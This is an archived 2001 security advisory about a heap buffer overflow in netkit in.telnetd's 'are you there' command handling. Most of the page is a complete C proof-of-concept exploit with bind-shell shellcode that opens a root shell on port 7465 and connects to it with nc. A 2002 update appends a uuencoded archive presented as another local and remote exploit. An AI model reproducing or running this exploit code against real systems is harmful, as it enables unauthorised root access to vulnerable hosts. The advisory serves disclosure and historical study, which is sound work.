Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: General :: lnx934.htm

telnetd local and remote buffer overflow



13th Aug 2001 [SBWID-934]
COMMAND

	telnetd local and remote buffer overflow
	

	

SYSTEMS AFFECTED

	    netkit <=0.17 in.telnetd

	

	

PROBLEM

	    \'zen-parse\'  found  following.    telnet-0.17-7  is  the   default

	    in.telnetd for  Redhat 7.0.   The version  of /usr/sbin/in.telnetd

	    that comes as default on Redhat 7.0, and many other  distributions

	    contains an exploitable  overflow in the  handling of its  output,

	    allowing execution of arbitrary commands.

	

	    The problem is in the  handling of the AYT commands,  as described

	    in the following advisory:

	
	        http://oliver.efri.hr/~crv/security/bugs/mUNIXes/telnet16.html

	

	    If the user  has local access  to the system,  it is possilble  to

	    get  the  program  to  set  arbitrary environment variables in the

	    environment of /bin/login, e.g. LD_PRELOAD=/tmp/make-rootshell.so.

	

	    By filling the heap, in a similar way to the teso exploit, it  its

	    possible to set 2 or more environment variables.

	

	    If the user doesn\'t have local access, it is possible to overwrite

	    the chunk header information for a pointer used by setenv(3),  and

	    store a  new chunk  in a  user controllable  location, so when the

	    envrionement  gets  reallocated  it  will  change  the  value   of

	    arbitrary memory locations.

	

	    You could  cause the  pointer to  set the  length of  the previous

	    chunk to the distance back from  the chunk to a point in  netibuf,

	    which itself contains a chunk to set the address of a function  in

	    the GOT to point to shellcode,  which could also be stored in  the

	    network input buffer.

	

	    Sometimes bad things happen that  you have to kludge to  fix. e.g.

	    push_clean() in the  proof of concept  exploit.  Sometimes  we got

	    some  characters  from  the  previous  input being sent again, and

	    when  that  was  a  command  to  set  an  environment  variable or

	    something else that changed the environment, it kinda messed  with

	    malloc calculations a little.

	

	    As it is, this exploit will probably not work on your machine, but

	    carefully modifying appropriate values should fix that.

	
	    #include <unistd.h>

	    #include <sys/types.h>

	    #include <sys/socket.h>

	    #include <netinet/in.h>

	    #include <netdb.h>

	    #include <stdio.h>

	    #include <fcntl.h>

	

	    /*********************************************************************

	           Proof of concept netkit-0.17-7 local root exploit.

	

	     Exploits buffer overflow in the AYT handling of in.telnetd,

	     due to bad logic in the handling of snprintf(), and

	

	          TESO advisory details were enough to allow me to put

	            controlable addresses in arbitary heap locations.

	

	        Heap based exploit. Overflow allows rewriting of some heap

	         data, which allowed me to put a new heap structure in the

	              input buffer, which let me do whatever I want.

	

	    \'traceroute exploit story -  By Dvorak, Synnergy Networks\' was very

	     helpful. Also malloc.c was good.

	

	    *********************************************************************/

	    /*

	                             Notes about exploit

	

	    1) RedHat 7.0, exploiting localhost

	    2) hostname is clarity.local

	    3) It probably won\'t work without at least a different setting for

	       the --size option, and probably the --name option as well. The

	       --name arguemnt  is the hostname part of the string that gets

	       returned by the AYT command, which may be different to the name

	       of the address you are connecting to..

	    4) There are a lot of things that use the heap, making the size

	       depend on alot of factors.

	

	    5) You will might need to change some (or all) of the offsets.

	       This program does allow you to brute force, if the hostname returned

	       by the AYT command is not a multiple of 3 letters long.

	

	     It is also possibly (at least according to some quick testing I did)

	     exploitable on some (all?) servers with names that are multiples of three

	     letters long, using the Abort Output command to add 2 characters to the

	     output length, and exploit the heap in a similar manner to this method.

	

	     (You can only directly put user controlable characters in 2 out of 3

	     locations (ie: no AO will give you a multiple of 3 bytes on the heap, AO

	     will give you 2 more than a multiple of 3 bytes) with controllable

	     characters, but when you count the null added by the netoprintf(), and use

	     0 as an option to a do or will, you can sometimes create valid chunks that

	     point to locations you can control. I have only tested this method with a

	     simulation, but it seems it would probably work with the telnetd as well.

	     I will look into it when I have time. Maybe.)

	

	

	                           .  .  _  _   _  _ .  .     _  _  _ .  .

	     |_  _|_ _|_  _ .  / / |/| |_| _| |  | ||/|  / |  | ||_ |  |

	     | |  |   |  |_|. / /  |  | |   _|.|_ |_||  | /  |_ |_| _| /

	                 |

	     *********************************************************************/

	

	

	

	

	    #define SERVER_PORT 23

	

	    #define ENV 18628

	

	    int offset12[] = {

	    // netibuf[343]->the chunk start.

	      -4, 0xaa,

	      -5, 0xbb,

	      -6, 0xcc,

	      -7, 0x10,

	      -9, 0xdd,

	      -10, 0x68,

	      -12, 0xee,

	      -13, 0x88,

	      -14, 0x99,

	      0, 0x00

	    };

	

	    int offset3[]={

	    -1,0x00,

	    0,0

	    };

	

	    int *offsets=offset12;

	

	

	    int dalen = 0;

	    int big;

	    int small;

	    int mipl = 0;

	    int ninbufoffset;

	    char spinchars[] = \"/|\\-\";

	

	    char tosend[] = {

	      0xff, 0xfd, 0x03, 0xff, 0xfb, 0x18, 0xff, 0xfb, 0x1f, 0xff, 0xfb, 0x20,

	      0xff, 0xfb, 0x21, 0xff, 0xfb, 0x22, 0xff, 0xfb, 0x27, 0xff, 0xfd, 0x05,

	      0xff, 0xfb, 0x23, 0

	    };

	

	    char lamagra_bind_code[] =

	    // the NOPs are my part... to jump over the modified places,

	    // without me having to take a look to see where they are.

	    // Modified to listen on 7465 == TAGS and work thru TELNET protocol.

	      \"x90xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"xebx20x90x90xebx20x90x90xebx20x90x90xebx20x90x90\"

	      \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\"

	      \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\"

	      \"x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8\"

	      \"x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89\"

	      \"x45xf4x43x66x89x5dxecx66xc7x45xeex1dx29x89x4dxf0\"

	      \"x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd\"

	      \"x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9\"

	      \"xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75\"

	      \"x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08\"

	      \"x8dx55x0cxcdx80xe8xe3\"

	      \"xffxffxffxffxffxff/bin/sh\";

	

	    char *shellcode = lamagra_bind_code;

	

	    int sock;			/* fd for socket connection */

	    FILE *dasock;			/* for doing fprint et al   */

	    struct sockaddr_in server;	/* the server end of the socket  */

	    struct hostent *hp;		/* Return value from gethostbyname() */

	    char buf[40960];		/* Received data buffer */

	    char sock_buf[64 * 1024];	/* Received data buffer */

	

	    char daenv[10000];

	    char oldenv[10000];

	

	    extern int errno;

	    read_sock ()

	    {

	      /* Prepare our buffer for a read and then read. */

	      bzero (buf, sizeof (buf));

	      if (read (sock, buf, sizeof (buf)) < 0)

	        if (errno != 11)

	          {

		    perror (\"! Socket read\");

		    exit (1);

	          }

	    }

	

	    sock_setup ()

	    {

	      int flags;

	      int yes = 1;

	      if ((sock = socket (AF_INET, SOCK_STREAM, 0)) < 0)

	        {

	          perror (\"! Error making the socketn\");

	          exit (1);

	        }

	      bzero ((char *) &server, sizeof (server));

	      server.sin_family = AF_INET;

	      if ((hp = gethostbyname (\"localhost\")) == NULL)

	        {

	          fprintf (stderr, \"! localhost unknown??n\");

	          exit (1);

	        }

	      bcopy (hp->h_addr, &server.sin_addr, hp->h_length);

	      server.sin_port = htons ((u_short) SERVER_PORT);

	

	      /* Try to connect */

	      if (connect (sock, (struct sockaddr *) &server, sizeof (server)) < 0)

	        {

	          perror (\"! Error connectingn\");

	          exit (1);

	        }

	

	      dasock = (FILE *) fdopen (sock, \"w+\");

	      if (!dasock)

	        {

	          perror (\"! Bad fdopen happened\");

	          exit (1);

	        }

	

	    /****************************************

	     Thanks to xphantom for the next 4 lines.

	     (which i don\'t need anymore   ;? )

	

	      flags = fcntl(sock, F_GETFL, 0);

	      flags |= O_NONBLOCK;

	      fcntl(sock, F_SETFL, flags);

	      if (setsockopt(sock, SOL_SOCKET, SO_OOBINLINE, &yes,sizeof(yes)) == -1) {

	            perror(\"setsockopt\");

	            exit(1);

	      }

	    *****************************************/

	

	

	      setbuffer (dasock, sock_buf, 64 * 1024);

	

	    }

	

	    do_iac (char c)

	    {

	      putc (0xff, dasock);

	      putc (c, dasock);

	    }

	

	    do_ayt ()

	    {

	      do_iac (0xf6); // sets buffer length to 2

	    }

	

	    doo (char c)

	    {

	      putc (255, dasock);

	      putc (253, dasock);

	      putc (c, dasock);

	    }

	    will (char c)

	    {

	      putc (255, dasock);

	      putc (251, dasock);

	      putc (c, dasock);

	    }

	    wont (char c)

	    {

	      putc (255, dasock);

	      putc (252, dasock);

	      putc (c, dasock);

	    }

	

	    void

	    solve (int remain)

	    {

	      int x, y;

	      big = -100;

	      small = -100;

	      for (x = 0; x < 120; x++)

	        for (y = 2; y < 80; y++)

	          {

		    if (((y * 3) + (x * dalen)) == remain)

		      {

		        big = x;

		        small = y;

		        return;

		      }

	          }

	          fprintf (stderr, \"I still can\'t work it out.nn\");

	          exit (1);

	    }

	

	    push_clean ()

	    {

	      int l;

	      for (l = 0; l < 8192; l++)

	        putc (0, dasock);

	    }

	

	    push_heap_attack ()

	    {

	      int l;

	      int shaddr = 0x805c970;

	      int overwrite = 0x08051e78;	// fopen

	      int tosend[] = {

	        0x805670eb,

	        0x8,

	        shaddr,

	        shaddr,

	        0x0,

	        0x0,

	        overwrite - 12,

	        shaddr

	      };

	      fwrite (shellcode, strlen (shellcode), 1, dasock);

	      for (l = strlen (shellcode); l < 289 + ninbufoffset; l++)

	        putc (0, dasock);

	      fwrite (tosend, 8, 4, dasock);

	      fflush (dasock);

	    }

	

	    fill2 (int count, char with, int real)

	    {

	      int l;

	      int first, rest, find;

	

	      first = (int) (count / dalen) - 10;

	      rest = (int) (((count) % dalen) / 3) * 3;

	      find = count - ((first * dalen) + (rest * 3));

	      solve (find);

	      first += big;

	      rest += small;

	      for (l = 0; l < first; l++)

	        do_ayt ();

	      for (l = 0; l < rest; l++)

	        will (with);

	      if (real == 1)

	        {

	          push_clean ();

	        }

	    }

	

	    fill (int count, char with)

	    {

	      fprintf (stderr, \"  o Length %d char %d (%02x)n\",

		       count, with & 0xff, with & 0xff);

	      fflush (stderr);

	      fill2 (8257, \'z\', 0);		// first part

	      fill2 (count - 8257, with, 1);	// do it for real

	    }

	

	    doenv (char *danam, char *daval)

	    {

	      sprintf (daenv, \"%c%c%c%c%c%s%c%s%c%c\",

	           /*  IAC   SB N-E IS VAR  name VAL value  IAC  SE  */

		       255, 250, 39, 0, 0, danam, 1, daval, 255, 240);

	

	      fwrite (daenv, 512, 1, dasock);

	      fflush (dasock);

	    }

	

	    main (int argc, char *argv[])

	    {

	      int br, l, dosleep = 0;

	      int percent = 0;

	      char spin;

	      unsigned char w;

	      bzero (oldenv, sizeof (oldenv));

	      argv++;

	      dalen = strlen (\"clarity.local\");

	      while (argv[0])

	        {

	          if (!strcmp (argv[0], \"--pause\"))

		    dosleep = 1;

	

	          if (!strcmp (argv[0], \"--size\") && argv[1])

		    {

		      mipl = atoi (argv[1]);

		      argv++;

		    }

	

	          if (!strcmp (argv[0], \"--name\") && argv[1])

		    {

		      dalen = strlen (argv[1]);

		      argv++;

		    }

	          argv++;

	        }

	      fprintf (stderr, \"  o MiPl of %4d  o NameLen of %2dn\", mipl, dalen);

	      if(dalen%3==0)

	      {

	       offsets=offset3;

	      }

	      else

	      {

	       ninbufoffset = mipl % 8192;

	       offsets[11] += 32 * (mipl - ninbufoffset) / 8192;

	       if (offsets[11] > 255)

	         {

	           fprintf (stderr, \"  ! MiPl too big.\", mipl, dalen);

	           exit (1);

	         }

	       }

	      sock_setup ();

	      if (dosleep)

	        {

	          system (\"sleep 1;ps aux|grep in.telnetd|grep -v grep\");

	          sleep (8);

	        }

	

	      dalen += strlen (\"rn[ : yes]rn\");

	      fprintf (stderr, \"o Sending IAC WILL NEW-ENVIRONMENT...n\");

	      fflush (stderr);

	      doo (5);

	      will (39);

	      fflush (dasock);

	      read_sock ();

	      fprintf (stderr, \"o Setting up environment vars...n\");

	      fflush (stderr);

	      will (1);

	      push_clean ();

	      doenv (\"USER\", \"zen-parse\");

	      doenv (\"TERM\", \"zen-parse\");

	      will (39);

	      fflush (dasock);

	      fprintf (stderr, \"o Doing overflows...n\");

	      fflush (stderr);

	      for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)

	        {

	          fill (mipl + ENV + offsets[br], offsets[br + 1]);

	          fflush (dasock);

	          usleep (100000);

	          read_sock ();

	        }

	      fprintf (stderr, \"o Overflows done...n\");

	      fflush (stderr);

	      push_clean ();

	

	      fprintf (stderr, \"o Sending IACs to start login process...n\");

	      fflush (stderr);

	      wont (24);

	      wont (32);

	      wont (35);

	      fprintf (dasock, \"%s\", tosend);

	      will (1);

	      push_heap_attack ();

	      sleep (1);

	      fprintf (stderr, \"o Attempting to lauch netcat to localhost rootshelln\");

	      execlp (\"nc\", \"nc\", \"-v\", \"localhost\", \"7465\", 0);

	      fprintf (stderr,

		       \"o If the exploit worked, there should be an open port on 7465.n\");

	      fprintf (stderr, \"  It is a root shell. You should probably close it.n\");

	      fflush (stderr);

	      sleep (60);

	      exit (0);

	    }

	    /********************************************************************

	

	     Thanks to xphantom for the help with getting the some of the socket

	     stuff working properly. Erm. I didn\'t end up using that method, but

	                             thanks anyway. ;]

	

	    This code is Copyright (c) 2001 zen-parse

	    Use and distribution is unlimited, provided the code is not modified.

	    If the code, including any of text is modified, that version may not

	    be redistrubuted.

	

	    ********************************************************************/

	    /* ObPlug 4 My Band: gone platinum, Chapel of Stilled voices, from */

	    /********************************************************************

	                Remember to visit Chapel of Stilled Voices:

	                                     _                 _     _ .  .

	       |_  _|_ _|_  _ .  / /.  .  _  _|  _  _ .  .  / |   _ |_ |  |

	       | |  |   |  |_|. / / |/| |_| _|.|_ |_||/| /  |_ |_| _| /

	      - - - - - - -|- - - - - - -|- - - - - - - - - - - - - - - - - -

	                   |             |

	    If there is anything below the next line someone is not following the

	    rules.  --zen-parse

	    ************************************END*****************************/

	

	

	 Update (28 February 2002)

	 ======

	

	Another local & remote exploit (uuencoded) :
	

	

	begin 644 sortelnetd.tgz

	M\'XL(`(@#>#P``^P[:7/;1K+Y2OZ*B;;B@!(E@=1EAY8WM$7%K,B22Z2=]=HI

	M%@@,1:Q``,&APXG>;W]]S``#D+23]YQ]]6I#\'P3GZ.GI[NEK&FF49#((9>;M

	M?O5G?6Q[WSZR;?BF3_V;GX_V]PYMNW-H=[ZR.YVC[N%7XN!/P\\CXY&GF)$)\\

	ME411]JEQG^O_?_I)2_[CHQOON%]\\#;MCVX=K^=^U[8-]XO_!\'OP\\VH/Q>_L=

	M^RMA?W%,5GS^P_F_N]D4F^)&)O<B<!92@`3L^K\'P%W$@%S+,G,R/PIV=\'1%&

	M(G5\"/[L7[ERZUZF`>3AUFL]F,A$1@)@%T6TJG\"\"@7R*;2Q$\'CBMQ&$Z7O^0R

	M=\"4#\\,,KU9[(*/%D8C9DB1.F\"S]-87\'5&$;9G(?PW]UF\\V]^Z`:Y)\\73//33

	MS-N9/S/:TOMT-[N/9;K<G$;NM<Q6#/<7LMJZW`)\'Q8=_NWZXICVF=D_.X*>8

	M3$[[;R\\N)\\]\')RO&XG&K`\'&2V-G%KAINF>=\'2TV!/\\6V8JU7XS>-SG[7;NPB

	MP3+A1F\'J,V%%X(?7P.![8,M<)E*DD8CS3/B9`)Y!HP63M[NV6,!Q$%,I//]&

	M3._%XQ82V@]A)\"\\\\`=DX%G:OV81%H%TFH1.(V$%ZBC1+<C?+`3Q,*K#J_V/R

	MNO_BQ\\%8/(\'CW<P!J:M0>B`%<.YXYOMRT,^]VHA-S\\F<7I-A\"UA^TX_G7E*T

	M``WAI]CD;T`,,8,?N/U0NBB^@)B32;T3_H&;0$+9\\`3$VE:CI=<3\'6@J?I*@

	MZ<7#B>/!6IY,,R!$K]Z>1GGB2NJAE6A<#%JUQPMS-S>4NPPBX`^<C5ZM\"2C3

	M*Y9&B<4U)C[L!OY3^TPC.+)T;F=YR\'N-DRB+TF*S,O3Z[K4%SRW&8NJDOCO!

	M=FP4;>0B_2=:\"F@B75_>R%2D<Y\"/692(\'$YUZ`&P+*53?>,D?@2-<40B0+H`

	M3VV>A*E`?@4R5.K!GPD\\0Q$(VS\'0\'!1)$$4Q0H4E$C5HNR-DDD0)/7?UA*;>

	M!*,,:-T0RBFCFWB3U/\\H^8>:TA*_-AO<V>,\'A8WZY<?E,\\@(_]\"\"!\"!N0)BS

	M&S4@D#-`6H,F:4DE\"(:7<A=@UY@!$B#YR<Q+@7H-\'#LA$4OT5.O\\S=D9D+;!

	M?V[G?B\"M#B\':\\&>6B3@U$.BGHM/B8TPPRO7@,TVD@Y(!C]G-3G8#\"+BP%@[I

	ME8TYM]K4I/^=GDS^.;B\\L!XAOJV>:AH-QA;0U&A4J*0R@#-@I5L=U=L6N!G]

	M_Z/LIB4$X=H4:SX:VWK[4D.#MKA]+*R2:-M$QU:O&$.8/2`9&XD\'NP/8\'J#.

	M2J2M!(*V`-C#\"$1-X&98-D\'.B&ZZ<]]N82>P%-1Q+G$>_`6R>Q+DX-;/YJAO

	MYK`(:$BB/JD>6-@RU%%+*3&U+`W9?N;\'DQOQ];\'8KRU1\'Y0F[D[*Z@-&*\\VB

	M6E9A1Q(,&)00YL\'FONJL8X]JT$1?Z<H2?VZ`+5A61>MNMGBG6WQB-$D+A8:X

	MAEDT3RV&L/TLFT]2[&F)WWXS-=W*D1Z-7*8,\'TD\\..78:#;#_?\'6R\',@G0):

	MR$-#Z*?\"#:(4;9RA\\)E9,W/-6>!<I>*1&+^<7([&ZKR5MH!P`4#24F?`$!F2

	MN?7@3H?GXM$C;5>.16<E<)\"1K2U\\TM)L*.*T;;<5H-\\0(EC\"UN_`J,YNU\'6\\

	M=7H\"-M=,Z0H^*Y\'84NJ05E(Z4VC.E;*&(\\0V\"P5\\%RJ4A$/->@;*=VG,\\C%L

	M$DG$UK&AHO6`L@6VJ2=U8=)#4UG2I&(.:MM$E_1WV(ABE28I.\\T^&R58383-

	ME*Y)JUGC09,U\"8\\D-5@,4*V]52I?6\"6!#=.6:@76UHB\"=@5\\M@EN?663XCBH

	M:PXJM+XQ\",XAJSNED9&T\"[EPXWN+Z(7CVFIP2]-$>0]I2SRU:]MO+C\'K@=V\'

	M:>X\'GG#P/(2>`[)0T:$WD>^)A7,MA_%++[\'8SH;,DR7E:NI6P!4L+<LB\')>N

	MS3;5U(,P]Z!G-MU`RWZE!5TC/I$5H8:V>0;NLJ6.0-GI>T7?X>%AM0]4TQ*P

	M+$,T.MW\'E59TFH>O7U]>C\"\\FXQ>O*WUIOF!O%`_S-3C4,L!X\"\\]QQ4S`(,/!

	M-/J\\%\'V-PBE]6,V%JBTHV#!VB0_%\"4KGJ+1)NQ%3/F$RF#5;S`G%\'NXU^%.W

	M#P4U#1N!(^O6H1A7V)S:*/\"8U9@`Y/276B^J%MT+S[5>9MQ!M?&NJYBYI.6/

	MF1[5KEN_E!I#1U0\'Y8D.EY@KXXOQN\']V]DY<@C0,3I`3-<I#+`\'!-8A$G26;

	M<9:P\'@NG]YDD[@CP@*X@\\@6><A21+]#5RB<\\)?(\\\'-HSQ^D^B*\\A[@/$A-`\"

	M\"(^DJH3%*X#R4Y[=K\\I=PY&@L!$5M&7<J`:#Z];EI@<$\"C9:@R&36(&C$-.K

	MXF<3+--$6ZE\'>D0+AFP:\';!PKXJ+L4>U,F_\'PJ]GL(/#%A@W^O5(V\'<S^+1Z

	MS6*Z,0Q;F2HP_;\\4*96.L[BCA:<+V#@X/Q$7I\\3$X?D/XI@8R0$9!`/HFU``

	M2GD2@*_/F^L$;AZ`F8%#]T)U6G3*U-F*4YE[T40=4VC7OD(A\"T8<B1ZB3%$J

	M5XZB<_.),432CS*)UG92).E&P:H!+$3*1H-`S)?\"K2JL;!&_[W1_7FK?)(Z\"

	MGOBLS[%?.YJ%U#8;`&.5LZ,&=[JT@+)U@$@;3U*GVZ*(;@K:(8])VP*@N:\'H

	M*LS0L@=#MI]5&6#J9>6XJW$F\"T3=N>\\U&CP*>:`T#_[45%^R&-AIFBI-L2VQ

	M2M<2=;0RL9:4\"6VG#78*U/>6:?45F;`72:7)!!X*Y?10SA]4\\D?.9K[KRS#C

	MY,#<S[)[,^\\PF27.%>80I6?&[6HU_E$:&C4KTQ:U#,#7R=0F\\QU#13W!2:OS

	MD5JOQF]P8W0X`4^!6%%^9,DQ4Z$W3%`>/`,H(FL%7OG?/`=Q^)J1(.]*TT_;

	M1A(V15R<4KH^FN)+#H6RCT\"+9\\_V(\"`8OIZ\\.A4Z!D,D:*7Z-#XW:EH1QRL4

	MCQ6*XE<DQ,Q/4IU/,)P`9D:O\"GR%R*G89*4V^\\1L/1,#^%*E*#<SBP0F(50H

	M+TA`[\'9Q&\'7^BZP#)L#:`EWE:%8?`%W@-W]]3%YEN4HM`T\"\"MD6#0+5TE?.U

	M70_WBYP$C-O&4[9Z&/QE451<1^C`^M)1+WA6^MY-PU=\'QWE%:N[SYX5/!=.X

	M4`?[=A&;<#@&\\HSQ:9G!+02^?DK3-BVD%GFJ`@8S\\@#>R2\"5!*`NRFMD:;V<

	M``9?&UCI$[=]3+0S!$0L20C:=\",E_7>(VKY#/?CG2@YN\'_U.,VBM,5*\'IR87

	MUX:G96QJ\\+4>BN(@8.KO\"$5U\'\"J,[B(*K2JF?;M-:!0)LV:CDH\\@S(I,1!4K

	M\"C6!#*4+*$2SNIXF1)E]%KP[-6HY]\\$+&014V1Q-PR5N\"C:C3+XBA#30[-2(

	MI$P`^V?%U04/1P.&26UG&DBV#8I<+#$K1&6SI=8GV:?4;M6^HUL`XW92=3M0

	MN@9JI(IRE-K60W6DPX*F;RGH?BX!+*.%&([.18\\\\S@9\'.;;:VPC=TM&[<PX=

	M9]8RD:&S.-9UROPP&--D8`2XNRD<4LRI^=FWJ0CE7:;.\'02F$00;$E2`G]%5

	MWRS\'RT!PH11.2]F.2HJC8]MM6V<3*B*\\)L,&C+08\\S(U9JA2%%Q*\"&OSCLQ%

	MLB`J2D85F9#0@56-(#$VP,4_F^O0N3P<7#GOL&X.Q#@=G@.A_!!B+,<3T4R`

	M@84&-_^(&-V+6Q](-47#*V^!:GRO5(@Z9?G*0U)1`6M1L4VO!E.\':]E>R2NN

	MY#\\!NH*SH>\'4N;B2B2OLPZ=XB)+UFTJ8KN\"AP2WZKO%D\"6N89:1\'\"Z8T\"G-*

	M:IAN>BV^^P&#T58ZV(]9<7#*6KN?Y#<:]YPTA6+DTA19[/`3V->GD^\'Y8-P>

	M7;SX<7+9_ZEM>.RM57)4M6D9@HGB#$@ZNCB;#%_#_,G+D\\OA^8NS]B/&5]DJ

	M^M%JK:2\"F6T_%GR]V*B\')!0-2`Y\'`%JK)TCI:ZU=W+\'4/Z4=;#[\\7]<J_/7Y

	M\\I_E^I_Y%U_CT_4_MGW4[7+]CWW0Z7:/J/ZGV_FK_N??\\0&]\'^?3P\'?K%03J

	M:OY?6!!\"[H!4EBQ*KD7@7]//,KT<A3+%M\'7O1)?GB/^Y*]?[`K<\\O?^=*]Y;

	M:9VY[B6*99B\".W:K[(!P*\"T.J-]P[IZT-5Y-WDH\'J)0(B%UTY0YHY)T=I\"SI

	M:QB#J7U\\IFJ)6+?`DR;D\'[)EO>8?XW_M_//C%ZX!_/3YWSL\\[!P6]9_[!WC^

	M]_?LO\\[_O^7#]7^)7$3@5,J[.(A4S4_@A_F=4`(A[)W.$1:$@8Q,,0[\'K[OO

	M[YUY%.VXT:*EM$4?:__P=AZD&/Z\"URA1-8B/,MR.G225X!-/\\ZLL<7X!<4TS

	M/\"QI)-Q$>C[6%D5B[B]H>0PM*)$^EQ\'$/EJMX\")CC-\\\\Z>`*,`,.07C%VF@!

	MLR)WXL[S\\-JH1D-XV\"W#&S\\!;\'2D)ZP<\\<-M8?XCO,%MH%\\&C^C5IUA@@A!Q

	M\"VKR#I/+X4C#C3P&[\\G,\\0/2@`YL_5O8!$\"&J(CK,)`>>@O@`0]\'XD7_7#P?

	MB).+\\X$`G[LO7EU<#L3@]\'3X8C@X\'XN?^N\\06/]L=\"%>7HS&Y_U7`_\'JS6@L

	MSB_&.//5F[/Q\\/79`\"\\B]L3S=^/!\"($/1?^5&+T!6.8RI\\-_#$[$^$+\\=\'\'Y

	MHSB]N!3]\\W<E7*M_(0CU`)@!4:@+I`3N(\"M]TE\'VMZG26K>P:2>DF`<)L`&*

	M&S8:YD&P@</3,$Y`%\\TP2J28!RN^()APY_SSRK^16$ZVB(`O(`&I/_4#/_-E

	M6O)W^.KUQ>6X?S[^CJ2`DE1NXL16B\\L3G21!*\'Z(1J>(2TF09OX=L\")P[B%H

	MY?(U*Z-Z1]C#+[F/D;X((MH8R\"#FKUN\"ZTLS^1VS:2$=4.Y@`V/0V\\/70J?\'

	MJ!`6+X(\\K,K2M;(BC0\']#$-E$\".^O?U.+-*TM4.``0/:-UE-JH<$(\"!13C!\'

	M`EMS_VHN%EG>(OIG(.E(U>T$;`RMA[*E#B=.(`&;YEBB>>LD$DT-AIF4\'H!S

	M=26]@HRX^E4B9?;QN\\95\'G[TX^_]Q(7#+\"Q]\'N\"W<.^G$L[E\'=.AT?@;6/-K

	MZ(CB[_/0P_W`A`46!\\/&(<1OK:B^+6M1/U.1NZ*,]4L4Z:XKR5U;38LEL;4V

	M\\`J<H-*VH?WA#15/7@[@:+X=3$X&9_UW=\'_<X&3Z\'4D.LL:3X!IX*3\'9N0+\"

	M.>`GI:B#6`PY#2!)<$F)H)\"A@%.=+?D6>0(BYV-,#RW*5:KHM5^+*+)RWQ=S

	MYFWUC6&E:Q70S1D63*[LF5[WF@_+%7SUCXJY>V4]\\O,WIZ/A/P?B<>=)MU;4

	M\"W[7>]7],R6X6!6`2M9UY\"J=M/+&!V;3I`#K4;T(#YFV4VEV#T!ZY87LV_[E

	ML/_\\;#`\"30#>&):=JPKH>90\'7`,A<G\'MN]?HYA;USLY]ANE=XO`<T%DX<,+H

	M.MO%FEN\\-@0^10L<\"*Q,XR@$E8B)0IAFX5D-046TMCK=`J0W`10C0\'ZB;`EM

	MPO/1AP:-2]#4\"+1KVEHYLTP5TY\\.+T\'_*_N$&ZS?U\\H;XG0%;#9WE`[\"_`ZH

	M7JP9OF6E&.)Z/JY\'B^L5F?%\\PX%IFD)!:FT&$OSZ<O!V.`+NVC;\"F<L[I8+M

	MNR-H2=6\\[N/#HZXB\'#?M-DMBX-(L9JM)X2M2T*%`1C%F%B$!5OQ>4+C\"V^8C

	M5)>8\'R[&!!OL%&K]*U#^1:`#MNS6P9`A(K&[3=!`6*!C@N@*+8:#IL[S/2=3

	MP&NP%88]P?`37$!C#</+0H%2\"%=``:K#H:\'G=\"Z#`\'V*]S\\?-QL;\'^[D],.=

	M[6S`,Z99[Z,<3N9&T7/4_7!W(#_<=9]\\N\'/M#W>/X7O_\\,-=!Y[WU6]WKVRW

	MW;*=?C^&9P^>)3XSW\"GT\'T*?\"^V/$0[,=P]+N!W5CS!P[<X^/#\\NX9FXN%W\\

	M9K@T_S\'#?V+`H/;#$@^\"]T3AY)KXU7%CN!H/VML>_ZOO@<:H_>MGW(<>1WO4

	M8P\\9KJO@[,W4GIZ48W3[?N?3;4@76O>HI,.1Q@/:9GMJ?U-N0QCVM)PO\'S.^

	MLYG^MSOUP]UTOH&7R:*I[N%G$1X#5%*WRL)$4_!&0SHVT6R&=QZE+>&&\"4TK

	M38E2>;U2W87WV)`*\"N6-4;A`=1BVT*7)0^0C8EK_C_N7/PS&(]&A-S*<Y`K5

	M=8D(MR@\\&B3_GDS=Q\"?/YWWWX\'!%N0B<W^5&?0Z7.NAH/>BUWRN$?NXI@XX1

	MO+YA08=61_2I^+L`NQ)^BYF/:]!K.X`U\']#$]>/W\'<2,K)W*N>Y#&`M`J<C\'

	M\\SE9$.OP?-$RZ3RSXN5J^9C>?K`6K=+,XBWK\\CCRK:V-;]*-MCD8RU\"=VQ)N

	MH\\Q;I.M@-E;TW_F9M=WA>SC:#+M%+T$+!I*+-<-\\P15+RM\'\'XM&V,N7MC1.?

	MXSV>)[[Q/H0;;9P\"O$\'\"T*VC`1_8\\J*HVK9T.L,DV*KW7^CUEV*`NCB;.0L_

	MN`=FJ*1\\;VF$<0NWE`U7]Z<K!AY#>-8_.;F<G$.HALEWWL>&\']XX@8_5K;#\'

	MUO)JE2+&[A[5?QC\\6G^/,!I?#OJOVK:Z0*C+`\"[?:6^HF:V-)<`ZVY8N75OR

	M%;@?MC]U`4Y7#&L6U:!I58.\'E\\[M?S@;B^R<W28=T>:7(8B%Q;US)#I8%PEF

	MO/`[RJR@KBBQP(?*83R$X/>UUS`I_C+U\\9),%&@HN6AHC7&!:HP4W`+<\"W+5

	M.,EX++Y1+W>I-\"2VT+$U]]$K(0U!\\<?D,H=H<=\"[!#/C11A2[>PP$8O!I^J^

	M4X#C\"G\'J%8X2^\"X8;*:[!U[E+:4=8/F8BN0P#9,H&\"!7*$E65<]5$LI_@HB;

	MX+684QPQN\'PGGE^^&??/1!_OV5\\.Q^-WRZ6=I\"39QK:6[6N;K&>E%?9M\'`,=

	MU22^I\\,8W051NX7!!EHLBCJ>BB[:\'7S>VC(7,V>0/T!3Z.FI.%\"/JZ?H3X)U

	MNV)ODR9MJ6AH$SV$M5/0\"%\'1L-K]9R/&-:^&U>#!R5TFY[I/Y.\\PB3Z)J3%:

